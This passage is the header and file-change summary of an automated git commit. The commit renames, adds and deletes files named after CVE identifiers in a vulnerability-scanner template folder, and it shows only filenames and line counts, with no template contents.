From e3f255eec0ae889870994f6ab0eee91b42ad660b Mon Sep 17 00:00:00 2001 From: test Date: Tue, 24 Dec 2024 02:32:24 +0000 Subject: [PATCH] Auto Updated --- README.md | 106 +- data.json | 3 +- data1.json | 53 +- nuclei-templates/CVE-2001/CVE-2001-1473.yaml | 20 + nuclei-templates/CVE-2001/cve-2001-1473.yaml | 29 - nuclei-templates/CVE-2004/CVE-2004-0519.yaml | 30 - nuclei-templates/CVE-2004/cve-2004-0519.yaml | 37 + nuclei-templates/CVE-2005/CVE-2005-2428.yaml | 33 - nuclei-templates/CVE-2005/cve-2005-2428.yaml | 25 + nuclei-templates/CVE-2007/CVE-2007-0885.yaml | 29 + nuclei-templates/CVE-2007/cve-2007-0885.yaml | 26 - ...{cve-2008-4668.yaml => CVE-2008-4668.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-5587.yaml | 27 + ...{cve-2008-6080.yaml => CVE-2008-6080.yaml} | 0 ...{cve-2008-6222.yaml => CVE-2008-6222.yaml} | 0 ...{CVE-2008-2650.yaml => cve-2008-2650.yaml} | 0 ...{CVE-2008-4764.yaml => cve-2008-4764.yaml} | 0 nuclei-templates/CVE-2008/cve-2008-5587.yaml | 29 - ...{CVE-2008-6172.yaml => cve-2008-6172.yaml} | 0 ...{cve-2009-1496.yaml => CVE-2009-1496.yaml} | 0 ...{cve-2009-2015.yaml => CVE-2009-2015.yaml} | 0 ...{cve-2009-2100.yaml => CVE-2009-2100.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-4202.yaml | 27 - nuclei-templates/CVE-2009/CVE-2009-4679.yaml | 27 - nuclei-templates/CVE-2009/CVE-2009-5020.yaml | 28 - ...{CVE-2009-0545.yaml => cve-2009-0545.yaml} | 0 nuclei-templates/CVE-2009/cve-2009-4202.yaml | 27 + nuclei-templates/CVE-2009/cve-2009-4679.yaml | 27 + nuclei-templates/CVE-2009/cve-2009-5020.yaml | 27 + ...{cve-2010-0219.yaml => CVE-2010-0219.yaml} | 0 ...{cve-2010-0467.yaml => CVE-2010-0467.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-0759.yaml | 27 - ...{cve-2010-0985.yaml => CVE-2010-0985.yaml} | 0 ...{cve-2010-1219.yaml => CVE-2010-1219.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1304.yaml | 27 - ...{cve-2010-1306.yaml => CVE-2010-1306.yaml} | 0 ...{cve-2010-1313.yaml => CVE-2010-1313.yaml} | 0 ...{cve-2010-1315.yaml => CVE-2010-1315.yaml} | 0 ...{cve-2010-1469.yaml => CVE-2010-1469.yaml} | 0 ...{cve-2010-1474.yaml => CVE-2010-1474.yaml} | 0 ...{cve-2010-1476.yaml => CVE-2010-1476.yaml} | 0 ...{cve-2010-1602.yaml => CVE-2010-1602.yaml} | 0 ...{cve-2010-1722.yaml => CVE-2010-1722.yaml} | 0 ...{cve-2010-1723.yaml => CVE-2010-1723.yaml} | 0 ...{cve-2010-1878.yaml => CVE-2010-1878.yaml} | 0 ...{cve-2010-1954.yaml => CVE-2010-1954.yaml} | 0 ...{cve-2010-1955.yaml => CVE-2010-1955.yaml} | 0 ...{cve-2010-1957.yaml => CVE-2010-1957.yaml} | 0 ...{cve-2010-1980.yaml => CVE-2010-1980.yaml} | 0 ...{cve-2010-2036.yaml => CVE-2010-2036.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2307.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-2861.yaml | 30 - ...{cve-2010-2918.yaml => CVE-2010-2918.yaml} | 0 ...{cve-2010-3426.yaml => CVE-2010-3426.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-4239.yaml | 45 + ...{cve-2010-4977.yaml => CVE-2010-4977.yaml} | 0 ...{cve-2010-5286.yaml => CVE-2010-5286.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-0759.yaml | 27 + ...{CVE-2010-0942.yaml => cve-2010-0942.yaml} | 0 ...{CVE-2010-0944.yaml => cve-2010-0944.yaml} | 0 ...{CVE-2010-1056.yaml => cve-2010-1056.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1304.yaml | 27 + ...{CVE-2010-1305.yaml => cve-2010-1305.yaml} | 0 ...{CVE-2010-1340.yaml => cve-2010-1340.yaml} | 0 ...{CVE-2010-1352.yaml => cve-2010-1352.yaml} | 0 ...{CVE-2010-1491.yaml => cve-2010-1491.yaml} | 0 ...{CVE-2010-1494.yaml => cve-2010-1494.yaml} | 0 ...{CVE-2010-1533.yaml => cve-2010-1533.yaml} | 0 ...{CVE-2010-1601.yaml => cve-2010-1601.yaml} | 0 ...{CVE-2010-1653.yaml => cve-2010-1653.yaml} | 0 ...{CVE-2010-1658.yaml => cve-2010-1658.yaml} | 0 ...{CVE-2010-1659.yaml => cve-2010-1659.yaml} | 0 ...{CVE-2010-1715.yaml => cve-2010-1715.yaml} | 0 ...{CVE-2010-1717.yaml => cve-2010-1717.yaml} | 0 ...{CVE-2010-1871.yaml => cve-2010-1871.yaml} | 0 ...{CVE-2010-1983.yaml => cve-2010-1983.yaml} | 0 ...{CVE-2010-2034.yaml => cve-2010-2034.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-2307.yaml | 26 + ...{CVE-2010-2682.yaml => cve-2010-2682.yaml} | 0 ...{CVE-2010-2857.yaml => cve-2010-2857.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-2861.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-4239.yaml | 34 - ...{CVE-2010-4719.yaml => cve-2010-4719.yaml} | 0 ...{CVE-2010-5278.yaml => cve-2010-5278.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-5107.yaml | 25 + nuclei-templates/CVE-2011/CVE-2011-5181.yaml | 29 - ...{CVE-2011-0049.yaml => cve-2011-0049.yaml} | 0 ...{CVE-2011-3315.yaml => cve-2011-3315.yaml} | 0 ...{CVE-2011-4969.yaml => cve-2011-4969.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-0392.yaml | 25 + ...{cve-2012-0996.yaml => CVE-2012-0996.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-1226.yaml | 27 - ...{cve-2012-4253.yaml => CVE-2012-4253.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-4940.yaml | 25 - nuclei-templates/CVE-2012/CVE-2012-5687.yaml | 18 + nuclei-templates/CVE-2012/cve-2012-0392.yaml | 25 - nuclei-templates/CVE-2012/cve-2012-1226.yaml | 27 + ...{CVE-2012-3153.yaml => cve-2012-3153.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-4940.yaml | 31 + nuclei-templates/CVE-2012/cve-2012-5687.yaml | 18 - nuclei-templates/CVE-2013/CVE-2013-1965.yaml | 29 + ...{cve-2013-3827.yaml => CVE-2013-3827.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-7091.yaml | 36 + nuclei-templates/CVE-2013/cve-2013-1965.yaml | 29 - ...{CVE-2013-5979.yaml => cve-2013-5979.yaml} | 0 nuclei-templates/CVE-2013/cve-2013-7091.yaml | 40 - nuclei-templates/CVE-2014/CVE-2014-1203.yaml | 51 + nuclei-templates/CVE-2014/CVE-2014-2323.yaml | 26 - nuclei-templates/CVE-2014/CVE-2014-2383.yaml | 54 - nuclei-templates/CVE-2014/CVE-2014-2908.yaml | 32 + nuclei-templates/CVE-2014/CVE-2014-3120.yaml | 54 + nuclei-templates/CVE-2014/CVE-2014-4535.yaml | 39 - nuclei-templates/CVE-2014/CVE-2014-4561.yaml | 32 - nuclei-templates/CVE-2014/CVE-2014-8799.yaml | 7 +- nuclei-templates/CVE-2014/CVE-2014-9606.yaml | 37 - nuclei-templates/CVE-2014/CVE-2014-9607.yaml | 37 + nuclei-templates/CVE-2014/CVE-2014-9609.yaml | 31 + nuclei-templates/CVE-2014/CVE-2014-9614.yaml | 44 - nuclei-templates/CVE-2014/CVE-2014-9615.yaml | 37 + nuclei-templates/CVE-2014/cve-2014-1203.yaml | 35 - nuclei-templates/CVE-2014/cve-2014-2323.yaml | 26 + nuclei-templates/CVE-2014/cve-2014-2908.yaml | 38 - nuclei-templates/CVE-2014/cve-2014-3120.yaml | 54 - ...{CVE-2014-3704.yaml => cve-2014-3704.yaml} | 0 ...{CVE-2014-6271.yaml => cve-2014-6271.yaml} | 0 ...{CVE-2014-6308.yaml => cve-2014-6308.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-9606.yaml | 39 + nuclei-templates/CVE-2014/cve-2014-9607.yaml | 39 - nuclei-templates/CVE-2014/cve-2014-9609.yaml | 33 - nuclei-templates/CVE-2014/cve-2014-9614.yaml | 46 + nuclei-templates/CVE-2014/cve-2014-9615.yaml | 39 - nuclei-templates/CVE-2015/CVE-2015-0554.yaml | 30 + ...{cve-2015-1503.yaml => CVE-2015-1503.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-2067.yaml | 27 - nuclei-templates/CVE-2015/CVE-2015-2166.yaml | 27 - nuclei-templates/CVE-2015/CVE-2015-3224.yaml | 57 - nuclei-templates/CVE-2015/CVE-2015-3337.yaml | 25 - ...{cve-2015-4050.yaml => CVE-2015-4050.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-4666.yaml | 46 - ...{cve-2015-5688.yaml => CVE-2015-5688.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-6920.yaml | 31 + nuclei-templates/CVE-2015/CVE-2015-9304.yaml | 58 - nuclei-templates/CVE-2015/CVE-2015-9471.yaml | 58 - nuclei-templates/CVE-2015/CVE-2015-9498.yaml | 58 - nuclei-templates/CVE-2015/cve-2015-0554.yaml | 32 - nuclei-templates/CVE-2015/cve-2015-2067.yaml | 27 + nuclei-templates/CVE-2015/cve-2015-2166.yaml | 29 + nuclei-templates/CVE-2015/cve-2015-3224.yaml | 43 + nuclei-templates/CVE-2015/cve-2015-3337.yaml | 25 + ...{CVE-2015-3897.yaml => cve-2015-3897.yaml} | 0 ...{CVE-2015-4632.yaml => cve-2015-4632.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-4666.yaml | 31 + .../CVE-2016/CVE-2016-1000126.yaml | 35 - .../CVE-2016/CVE-2016-1000128.yaml | 32 - .../CVE-2016/CVE-2016-1000136.yaml | 33 + .../CVE-2016/CVE-2016-1000142.yaml | 34 + .../CVE-2016/CVE-2016-1000155.yaml | 34 + nuclei-templates/CVE-2016/CVE-2016-10872.yaml | 58 - nuclei-templates/CVE-2016/CVE-2016-10884.yaml | 58 + nuclei-templates/CVE-2016/CVE-2016-10993.yaml | 7 +- nuclei-templates/CVE-2016/CVE-2016-11085.yaml | 58 + nuclei-templates/CVE-2016/CVE-2016-2004.yaml | 31 + ...{cve-2016-3978.yaml => CVE-2016-3978.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-4977.yaml | 32 + nuclei-templates/CVE-2016/CVE-2016-6210.yaml | 33 - nuclei-templates/CVE-2016/CVE-2016-7552.yaml | 30 - ...{CVE-2016-1555.yaml => cve-2016-1555.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-2004.yaml | 31 - ...{CVE-2016-3081.yaml => cve-2016-3081.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-4977.yaml | 36 - nuclei-templates/CVE-2016/cve-2016-6210.yaml | 33 + nuclei-templates/CVE-2016/cve-2016-7552.yaml | 30 + ...017-1000028.yaml => CVE-2017-1000028.yaml} | 0 ...017-1000029.yaml => CVE-2017-1000029.yaml} | 0 ...ve-2017-10271.yaml => CVE-2017-10271.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-11586.yaml | 48 - nuclei-templates/CVE-2017/CVE-2017-12138.yaml | 49 - nuclei-templates/CVE-2017/CVE-2017-12149.yaml | 44 + ...ve-2017-12583.yaml => CVE-2017-12583.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-12615.yaml | 55 + nuclei-templates/CVE-2017/CVE-2017-12635.yaml | 49 + nuclei-templates/CVE-2017/CVE-2017-12637.yaml | 33 - nuclei-templates/CVE-2017/CVE-2017-14524.yaml | 43 + nuclei-templates/CVE-2017/CVE-2017-14535.yaml | 38 - ...ve-2017-14537.yaml => CVE-2017-14537.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-15944.yaml | 33 + nuclei-templates/CVE-2017/CVE-2017-17059.yaml | 34 - nuclei-templates/CVE-2017/CVE-2017-18634.yaml | 58 + nuclei-templates/CVE-2017/CVE-2017-5521.yaml | 32 - ...{cve-2017-5982.yaml => CVE-2017-5982.yaml} | 0 ...{cve-2017-8917.yaml => CVE-2017-8917.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-9822.yaml | 36 + ...VE-2017-11444.yaml => cve-2017-11444.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-11586.yaml | 29 + nuclei-templates/CVE-2017/cve-2017-12138.yaml | 37 + nuclei-templates/CVE-2017/cve-2017-12149.yaml | 44 - nuclei-templates/CVE-2017/cve-2017-12615.yaml | 55 - nuclei-templates/CVE-2017/cve-2017-12635.yaml | 49 - nuclei-templates/CVE-2017/cve-2017-12637.yaml | 33 + nuclei-templates/CVE-2017/cve-2017-14524.yaml | 29 - nuclei-templates/CVE-2017/cve-2017-14535.yaml | 38 + ...VE-2017-15363.yaml => cve-2017-15363.yaml} | 0 ...VE-2017-15647.yaml => cve-2017-15647.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-15944.yaml | 33 - ...VE-2017-16806.yaml => cve-2017-16806.yaml} | 0 ...VE-2017-18638.yaml => cve-2017-18638.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-5521.yaml | 32 + ...{CVE-2017-5631.yaml => cve-2017-5631.yaml} | 0 ...{CVE-2017-9791.yaml => cve-2017-9791.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-9822.yaml | 36 - ...{cve-2018-0101.yaml => CVE-2018-0101.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-0296.yaml | 32 + .../CVE-2018/CVE-2018-1000130.yaml | 43 + .../CVE-2018/CVE-2018-1000226.yaml | 60 + ...018-1000533.yaml => CVE-2018-1000533.yaml} | 0 .../CVE-2018/CVE-2018-1000856.yaml | 69 - ...ve-2018-10093.yaml => CVE-2018-10093.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10230.yaml | 53 - nuclei-templates/CVE-2018/CVE-2018-10818.yaml | 38 + ...ve-2018-10956.yaml => CVE-2018-10956.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-11231.yaml | 56 - nuclei-templates/CVE-2018/CVE-2018-11709.yaml | 30 + ...ve-2018-11776.yaml => CVE-2018-11776.yaml} | 0 ...ve-2018-12054.yaml => CVE-2018-12054.yaml} | 0 ...ve-2018-12296.yaml => CVE-2018-12296.yaml} | 0 ...ve-2018-12300.yaml => CVE-2018-12300.yaml} | 0 ...ve-2018-12613.yaml => CVE-2018-12613.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-1273.yaml | 43 + ...{cve-2018-1335.yaml => CVE-2018-1335.yaml} | 0 ...ve-2018-13379.yaml => CVE-2018-13379.yaml} | 0 ...ve-2018-14912.yaml => CVE-2018-14912.yaml} | 0 ...ve-2018-15138.yaml => CVE-2018-15138.yaml} | 0 ...ve-2018-15745.yaml => CVE-2018-15745.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16283.yaml | 12 +- ...ve-2018-16288.yaml => CVE-2018-16288.yaml} | 0 ...ve-2018-16670.yaml => CVE-2018-16670.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16761.yaml | 43 - nuclei-templates/CVE-2018/CVE-2018-17207.yaml | 58 + ...ve-2018-17254.yaml => CVE-2018-17254.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-17422.yaml | 46 - nuclei-templates/CVE-2018/CVE-2018-18264.yaml | 36 + nuclei-templates/CVE-2018/CVE-2018-18777.yaml | 33 + ...ve-2018-18778.yaml => CVE-2018-18778.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19136.yaml | 61 + nuclei-templates/CVE-2018/CVE-2018-19137.yaml | 59 + ...ve-2018-19365.yaml => CVE-2018-19365.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19752.yaml | 69 - nuclei-templates/CVE-2018/CVE-2018-19892.yaml | 69 - nuclei-templates/CVE-2018/CVE-2018-19914.yaml | 61 - nuclei-templates/CVE-2018/CVE-2018-19915.yaml | 61 + nuclei-templates/CVE-2018/CVE-2018-20009.yaml | 59 - nuclei-templates/CVE-2018/CVE-2018-20010.yaml | 60 + ...{cve-2018-2392.yaml => CVE-2018-2392.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-2628.yaml | 32 - ...{cve-2018-3238.yaml => CVE-2018-3238.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-6200.yaml | 48 + nuclei-templates/CVE-2018/CVE-2018-7543.yaml | 58 + ...{cve-2018-9995.yaml => CVE-2018-9995.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-0296.yaml | 32 - .../CVE-2018/cve-2018-1000130.yaml | 43 - .../CVE-2018/cve-2018-1000226.yaml | 58 - .../CVE-2018/cve-2018-1000856.yaml | 52 + ...VE-2018-10201.yaml => cve-2018-10201.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-10230.yaml | 41 + nuclei-templates/CVE-2018/cve-2018-10818.yaml | 38 - ...VE-2018-10822.yaml => cve-2018-10822.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-11231.yaml | 44 + nuclei-templates/CVE-2018/cve-2018-1273.yaml | 43 - ...VE-2018-13980.yaml => cve-2018-13980.yaml} | 0 ...VE-2018-14064.yaml => cve-2018-14064.yaml} | 0 ...VE-2018-15640.yaml => cve-2018-15640.yaml} | 0 ...VE-2018-15657.yaml => cve-2018-15657.yaml} | 0 ...VE-2018-16059.yaml => cve-2018-16059.yaml} | 0 ...VE-2018-16133.yaml => cve-2018-16133.yaml} | 0 ...VE-2018-16716.yaml => cve-2018-16716.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-16761.yaml | 32 + nuclei-templates/CVE-2018/cve-2018-17422.yaml | 39 + nuclei-templates/CVE-2018/cve-2018-18069.yaml | 32 + nuclei-templates/CVE-2018/cve-2018-18264.yaml | 25 - nuclei-templates/CVE-2018/cve-2018-18777.yaml | 33 - nuclei-templates/CVE-2018/cve-2018-19136.yaml | 44 - nuclei-templates/CVE-2018/cve-2018-19137.yaml | 43 - nuclei-templates/CVE-2018/cve-2018-19752.yaml | 52 + ...VE-2018-19753.yaml => cve-2018-19753.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-19892.yaml | 51 + nuclei-templates/CVE-2018/cve-2018-19914.yaml | 46 + nuclei-templates/CVE-2018/cve-2018-19915.yaml | 47 - nuclei-templates/CVE-2018/cve-2018-20009.yaml | 47 + nuclei-templates/CVE-2018/cve-2018-20010.yaml | 47 - nuclei-templates/CVE-2018/cve-2018-2628.yaml | 30 + ...{CVE-2018-6008.yaml => cve-2018-6008.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-6200.yaml | 37 - ...{CVE-2018-6910.yaml => cve-2018-6910.yaml} | 0 ...{CVE-2018-7719.yaml => cve-2018-7719.yaml} | 0 ...{CVE-2018-8033.yaml => cve-2018-8033.yaml} | 0 ...{CVE-2018-8715.yaml => cve-2018-8715.yaml} | 0 ...{CVE-2018-9161.yaml => cve-2018-9161.yaml} | 0 ...{CVE-2018-9205.yaml => cve-2018-9205.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-0230.yaml | 26 - nuclei-templates/CVE-2019/CVE-2019-10232.yaml | 37 + nuclei-templates/CVE-2019/CVE-2019-10717.yaml | 54 + nuclei-templates/CVE-2019/CVE-2019-11370.yaml | 53 - ...ve-2019-12314.yaml => CVE-2019-12314.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-12581.yaml | 55 - nuclei-templates/CVE-2019/CVE-2019-12593.yaml | 36 + nuclei-templates/CVE-2019/CVE-2019-12962.yaml | 56 + ...ve-2019-13101.yaml => CVE-2019-13101.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-13573.yaml | 58 - nuclei-templates/CVE-2019/CVE-2019-14313.yaml | 58 + ...ve-2019-15107.yaml => CVE-2019-15107.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15112.yaml | 58 - nuclei-templates/CVE-2019/CVE-2019-15116.yaml | 58 + nuclei-templates/CVE-2019/CVE-2019-15713.yaml | 35 - nuclei-templates/CVE-2019/CVE-2019-16118.yaml | 58 - nuclei-templates/CVE-2019/CVE-2019-16219.yaml | 60 + ...ve-2019-16313.yaml => CVE-2019-16313.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16662.yaml | 28 + nuclei-templates/CVE-2019/CVE-2019-16996.yaml | 50 + nuclei-templates/CVE-2019/CVE-2019-17232.yaml | 58 + nuclei-templates/CVE-2019/CVE-2019-17233.yaml | 58 - ...ve-2019-17270.yaml => CVE-2019-17270.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-17382.yaml | 37 + nuclei-templates/CVE-2019/CVE-2019-17506.yaml | 36 - nuclei-templates/CVE-2019/CVE-2019-17673.yaml | 60 - nuclei-templates/CVE-2019/CVE-2019-1821.yaml | 51 - nuclei-templates/CVE-2019/CVE-2019-18371.yaml | 43 + nuclei-templates/CVE-2019/CVE-2019-19824.yaml | 33 - .../CVE-2019-19985.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-20141.yaml | 27 + nuclei-templates/CVE-2019/CVE-2019-20209.yaml | 58 + nuclei-templates/CVE-2019/CVE-2019-20224.yaml | 61 - nuclei-templates/CVE-2019/CVE-2019-20360.yaml | 58 - nuclei-templates/CVE-2019/CVE-2019-25141.yaml | 58 + ...{cve-2019-2725.yaml => CVE-2019-2725.yaml} | 0 ...{cve-2019-2767.yaml => CVE-2019-2767.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-3401.yaml | 33 + ...{cve-2019-3911.yaml => CVE-2019-3911.yaml} | 0 ...{cve-2019-3912.yaml => CVE-2019-3912.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-3929.yaml | 33 + nuclei-templates/CVE-2019/CVE-2019-6112.yaml | 23 - .../CVE-2019-6715.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-7192.yaml | 87 + ...{cve-2019-7238.yaml => CVE-2019-7238.yaml} | 0 ...{cve-2019-7609.yaml => CVE-2019-7609.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-8449.yaml | 30 + ...{cve-2019-8903.yaml => CVE-2019-8903.yaml} | 0 ...{cve-2019-9082.yaml => CVE-2019-9082.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9567.yaml | 58 + nuclei-templates/CVE-2019/CVE-2019-9618.yaml | 30 - nuclei-templates/CVE-2019/CVE-2019-9912.yaml | 58 + nuclei-templates/CVE-2019/CVE-2019-9922.yaml | 45 + nuclei-templates/CVE-2019/cve-2019-0230.yaml | 26 + ...VE-2019-10068.yaml => cve-2019-10068.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-10232.yaml | 40 - nuclei-templates/CVE-2019/cve-2019-10717.yaml | 38 - ...VE-2019-10758.yaml => cve-2019-10758.yaml} | 0 ...VE-2019-11043.yaml => cve-2019-11043.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-11370.yaml | 39 + nuclei-templates/CVE-2019/cve-2019-12581.yaml | 43 + nuclei-templates/CVE-2019/cve-2019-12593.yaml | 36 - nuclei-templates/CVE-2019/cve-2019-12962.yaml | 47 - ...VE-2019-14312.yaml => cve-2019-14312.yaml} | 0 ...VE-2019-15859.yaml => cve-2019-15859.yaml} | 0 ...VE-2019-16097.yaml => cve-2019-16097.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-16662.yaml | 28 - ...VE-2019-16759.yaml => cve-2019-16759.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-16996.yaml | 36 - nuclei-templates/CVE-2019/cve-2019-17382.yaml | 37 - ...VE-2019-17418.yaml => cve-2019-17418.yaml} | 0 ...VE-2019-17503.yaml => cve-2019-17503.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-17506.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-1821.yaml | 57 + nuclei-templates/CVE-2019/cve-2019-18371.yaml | 35 - ...VE-2019-18393.yaml => cve-2019-18393.yaml} | 0 ...VE-2019-18394.yaml => cve-2019-18394.yaml} | 0 ...VE-2019-19781.yaml => cve-2019-19781.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-19824.yaml | 33 + nuclei-templates/CVE-2019/cve-2019-20141.yaml | 47 - ...VE-2019-20183.yaml => cve-2019-20183.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-20224.yaml | 53 + ...{CVE-2019-2729.yaml => cve-2019-2729.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-3401.yaml | 33 - nuclei-templates/CVE-2019/cve-2019-3929.yaml | 33 - nuclei-templates/CVE-2019/cve-2019-7192.yaml | 21 - ...{CVE-2019-7543.yaml => cve-2019-7543.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-8449.yaml | 30 - ...{CVE-2019-9041.yaml => cve-2019-9041.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-9922.yaml | 31 - nuclei-templates/CVE-2020/CVE-2020-10220.yaml | 52 - nuclei-templates/CVE-2020/CVE-2020-11515.yaml | 58 - .../CVE-2020-12054.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-12116.yaml | 46 + ...ve-2020-12256.yaml => CVE-2020-12256.yaml} | 0 ...ve-2020-12271.yaml => CVE-2020-12271.yaml} | 0 ...ve-2020-12447.yaml => CVE-2020-12447.yaml} | 0 ...ve-2020-13158.yaml => CVE-2020-13158.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13700.yaml | 38 + nuclei-templates/CVE-2020/CVE-2020-14408.yaml | 53 + nuclei-templates/CVE-2020/CVE-2020-14750.yaml | 77 + ...ve-2020-15004.yaml => CVE-2020-15004.yaml} | 0 ...ve-2020-15050.yaml => CVE-2020-15050.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-15299.yaml | 58 - nuclei-templates/CVE-2020/CVE-2020-15505.yaml | 42 - ...ve-2020-16139.yaml => CVE-2020-16139.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-16920.yaml | 59 - nuclei-templates/CVE-2020/CVE-2020-16952.yaml | 40 + nuclei-templates/CVE-2020/CVE-2020-17505.yaml | 41 + nuclei-templates/CVE-2020/CVE-2020-17519.yaml | 28 + nuclei-templates/CVE-2020/CVE-2020-20982.yaml | 34 + ...ve-2020-21224.yaml => CVE-2020-21224.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-22208.yaml | 44 + nuclei-templates/CVE-2020/CVE-2020-22211.yaml | 45 + nuclei-templates/CVE-2020/CVE-2020-24912.yaml | 40 + ...ve-2020-24949.yaml => CVE-2020-24949.yaml} | 0 .../CVE-2020-25213.yaml | 17 +- nuclei-templates/CVE-2020/CVE-2020-25864.yaml | 44 - ...ve-2020-26073.yaml => CVE-2020-26073.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-26153.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-26413.yaml | 50 - nuclei-templates/CVE-2020/CVE-2020-28036.yaml | 60 + nuclei-templates/CVE-2020/CVE-2020-28037.yaml | 60 - nuclei-templates/CVE-2020/CVE-2020-28038.yaml | 60 - nuclei-templates/CVE-2020/CVE-2020-28039.yaml | 60 + nuclei-templates/CVE-2020/CVE-2020-28188.yaml | 33 + nuclei-templates/CVE-2020/CVE-2020-28978.yaml | 58 + nuclei-templates/CVE-2020/CVE-2020-29164.yaml | 36 + ...ve-2020-29453.yaml => CVE-2020-29453.yaml} | 0 ...ve-2020-35338.yaml => CVE-2020-35338.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35846.yaml | 44 - nuclei-templates/CVE-2020/CVE-2020-35848.yaml | 35 + nuclei-templates/CVE-2020/CVE-2020-36155.yaml | 58 - nuclei-templates/CVE-2020/CVE-2020-36157.yaml | 58 - nuclei-templates/CVE-2020/CVE-2020-36289.yaml | 37 - nuclei-templates/CVE-2020/CVE-2020-36710.yaml | 58 + nuclei-templates/CVE-2020/CVE-2020-36739.yaml | 58 - nuclei-templates/CVE-2020/CVE-2020-36760.yaml | 58 - nuclei-templates/CVE-2020/CVE-2020-5777.yaml | 36 + nuclei-templates/CVE-2020/CVE-2020-6308.yaml | 27 - ...{cve-2020-6637.yaml => CVE-2020-6637.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-6859.yaml | 58 + ...{cve-2020-7961.yaml => CVE-2020-7961.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-7980.yaml | 55 - ...{cve-2020-8163.yaml => CVE-2020-8163.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8436.yaml | 58 - nuclei-templates/CVE-2020/CVE-2020-8641.yaml | 32 + nuclei-templates/CVE-2020/CVE-2020-8654.yaml | 60 + nuclei-templates/CVE-2020/CVE-2020-8658.yaml | 58 + nuclei-templates/CVE-2020/CVE-2020-8771.yaml | 54 - nuclei-templates/CVE-2020/CVE-2020-8772.yaml | 83 - nuclei-templates/CVE-2020/CVE-2020-9047.yaml | 66 + nuclei-templates/CVE-2020/CVE-2020-9054.yaml | 40 + ...{cve-2020-9315.yaml => CVE-2020-9315.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-9454.yaml | 58 - ...{cve-2020-9483.yaml => CVE-2020-9483.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-9484.yaml | 41 + nuclei-templates/CVE-2020/CVE-2020-9496.yaml | 44 + .../CVE-2020/CVE-20200924a(1).yaml | 39 + ...VE-2020-10124.yaml => 